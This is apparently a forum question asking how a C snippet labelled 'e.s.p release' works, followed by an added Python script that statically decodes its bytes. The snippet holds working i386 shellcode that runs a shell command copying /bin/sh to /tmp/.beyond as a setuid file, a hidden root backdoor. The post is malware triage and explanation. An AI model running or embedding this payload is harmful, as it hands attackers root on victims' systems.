<p><pre><code>char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
  = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
</code></pre>
Can anyone explain this one? I would have guessed that it's causing an exec (or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...". That's malicious if run as root ('4' in 4755 is setuid, so it basically hides a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post is wrong, but I'd still like to know how this works.
<p>What I've gathered:
<p>1. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm getting the argv from. The exec is mostly a guess, because I can't think what else it would be doing. The previous hex bytes are non-text, possibly precompiled executable code.
<p>2. The '__attribute__ ((section(".text")))' is a gcc extension that causes this string not to be stored where it usually would be in the binary. I believe the .data section would be more normal? But I've never been very clear on what the different sections are for.
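<p>The decoding the question does by hand, as an added example that is not part of the original post and not code from whoever wrote the snippet: a Python triage script that parses the adjacent C string literals into the bytes the compiler would store, lists the printable strings with their offsets (as strings(1) would), looks for the 32-bit Linux execve syscall stub (mov al, 0x0b ; int 0x80, where 11 is execve on i386) and follows the opening short jmp to a call, the usual way such code pushes the address of an embedded string onto the stack without knowing where it was loaded. The byte values and offsets come from the literals as posted; the helper names and the printable-run threshold are this script's own choices. Nothing is executed; the bytes are only parsed.

```python
"""Static triage of a byte string embedded in C source: decode the literals,
list printable strings, flag the i386 Linux execve stub, follow jmp/call/pop."""
import re
import struct

# Constructed copy of the literals from the post; the compiler concatenates
# adjacent literals into a single array (plus a trailing NUL, not counted here).
C_LITERALS = r'''
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"
'''

_SIMPLE_ESCAPES = {'n': 10, 't': 9, 'r': 13, 'a': 7, 'b': 8, 'f': 12,
                   'v': 11, '\\': 92, '"': 34, "'": 39, '?': 63}

# mov al, 0x0b ; int 0x80 -- syscall 11 is execve on 32-bit Linux.
LINUX_I386_EXECVE_STUB = b'\xb0\x0b\xcd\x80'


def decode_c_literals(text: str) -> bytes:
    """Decode one or more adjacent C string literals into the bytes the
    compiler would emit. Hex escapes are greedy, as in C; octal takes up
    to three digits."""
    out = bytearray()
    for lit in re.findall(r'"((?:[^"\\]|\\.)*)"', text, re.S):
        i = 0
        while i < len(lit):
            ch = lit[i]
            if ch != '\\':
                out.append(ord(ch))
                i += 1
                continue
            nxt = lit[i + 1]
            if nxt == 'x':
                m = re.match(r'[0-9a-fA-F]+', lit[i + 2:])
                out.append(int(m.group(0), 16) & 0xFF)
                i += 2 + len(m.group(0))
            elif nxt in '01234567':
                m = re.match(r'[0-7]{1,3}', lit[i + 1:])
                out.append(int(m.group(0), 8) & 0xFF)
                i += 1 + len(m.group(0))
            elif nxt in _SIMPLE_ESCAPES:
                out.append(_SIMPLE_ESCAPES[nxt])
                i += 2
            else:
                raise ValueError(f"unsupported escape \\{nxt}")
    return bytes(out)


def printable_runs(blob: bytes, min_len: int = 4):
    """(offset, text) for every run of >= min_len printable ASCII bytes,
    the same heuristic strings(1) uses; expect some false positives, since
    push/pop opcodes (0x50..0x5f) are the letters 'P'..'_'."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [(m.start(), m.group(0).decode('ascii'))
            for m in re.finditer(pattern, blob)]


def find_execve_stubs(blob: bytes):
    """Offsets of every mov al,0x0b ; int 0x80 sequence in the blob."""
    return [i for i in range(len(blob))
            if blob.startswith(LINUX_I386_EXECVE_STUB, i)]


def follow_jmp_call_pop(blob: bytes):
    """If the blob opens with a short JMP (EB rel8) whose target is a CALL
    (E8 rel32), report where the jump lands, where the call goes, and the
    offset the CALL pushes (the bytes right after it, normally a string that
    the code at call_target then POPs into a register). None if absent."""
    if len(blob) < 2 or blob[0] != 0xEB:
        return None
    jmp_target = 2 + struct.unpack('b', blob[1:2])[0]
    if jmp_target < 0 or jmp_target + 5 > len(blob) or blob[jmp_target] != 0xE8:
        return None
    rel32 = struct.unpack('<i', blob[jmp_target + 1:jmp_target + 5])[0]
    pushed = jmp_target + 5
    call_target = pushed + rel32
    return {
        "jmp_target": jmp_target,
        "call_target": call_target,
        "pushed_offset": pushed,
        "call_target_is_pop": 0 <= call_target < len(blob)
                              and 0x58 <= blob[call_target] <= 0x5F,
    }


def triage(text: str) -> dict:
    blob = decode_c_literals(text)
    return {"length": len(blob), "strings": printable_runs(blob),
            "execve_stubs": find_execve_stubs(blob),
            "jmp_call_pop": follow_jmp_call_pop(blob)}


if __name__ == "__main__":
    for key, value in triage(C_LITERALS).items():
        print(f"{key}: {value}")
```

On the posted bytes this reports 132 bytes, the execve stub at offset 55, and a jmp to offset 64 where a call back to offset 2 (a pop ebx) pushes offset 69, which is exactly where "/bin/sh" sits; the strings list also shows "VSTY" at offset 51, a false positive from four consecutive push/pop opcodes. The section attribute matters for the same reason the script never runs the bytes: .data is writable but not executable on a system with NX, so code that intends to jump into a byte array has to place it in the executable section.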